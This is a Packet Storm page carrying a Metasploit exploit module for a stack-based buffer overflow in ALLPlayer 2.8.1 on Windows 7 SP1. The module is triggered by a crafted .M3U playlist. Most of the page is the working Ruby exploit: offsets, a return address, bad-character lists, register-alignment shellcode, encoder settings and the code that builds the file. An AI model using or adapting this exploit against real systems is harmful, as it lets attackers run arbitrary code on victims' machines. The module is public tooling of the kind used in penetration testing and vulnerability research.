exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ALLPlayer M3U Buffer Overflow

ALLPlayer M3U Buffer Overflow
Posted Mar 5, 2014
Authored by Gabor Seljan, metacom, Mike Czumak | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow vulnerability in ALLPlayer 2.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows 7 SP1.

tags | exploit, remote, overflow, arbitrary
systems | windows
advisories | OSVDB-98283
SHA-256 | 3024048d0a34139924bf86ad54652b2205faa11b7eda9905b10fe7256e77bd1e

ALLPlayer M3U Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'ALLPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
ALLPlayer 2.8.1, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .M3U file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery
'Mike Czumak', # Original exploit
'Gabor Seljan' # Metasploit module
],
'References' =>
[
[ 'BID', '62926' ],
[ 'BID', '63896' ],
[ 'EDB', '28855' ],
[ 'EDB', '29549' ],
[ 'EDB', '29798' ],
[ 'EDB', '32041' ],
[ 'OSVDB', '98283' ],
[ 'URL', 'http://www.allplayer.org/' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
'Space' => 3060,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX'
}
},
'Targets' =>
[
[ ' ALLPlayer 2.8.1 / Windows 7 SP1',
{
'Offset' => 301,
'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe
'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 09 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
],
self.class)

end


def exploit
nop = target['Nop']

sploit = rand_text_alpha_upper(target['Offset'])
sploit << "\x61\x50" # POPAD
sploit << target.ret
sploit << "\x53" # PUSH EBX
sploit << nop
sploit << "\x58" # POP EAX
sploit << nop
sploit << "\x05\x14\x11" # ADD EAX,0x11001400
sploit << nop
sploit << "\x2d\x13\x11" # SUB EAX,0x11001300
sploit << nop
sploit << "\x50" # PUSH EAX
sploit << nop
sploit << "\xc3" # RET
sploit << nop * 109
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception

# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create("http://" + sploit)

end
end

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close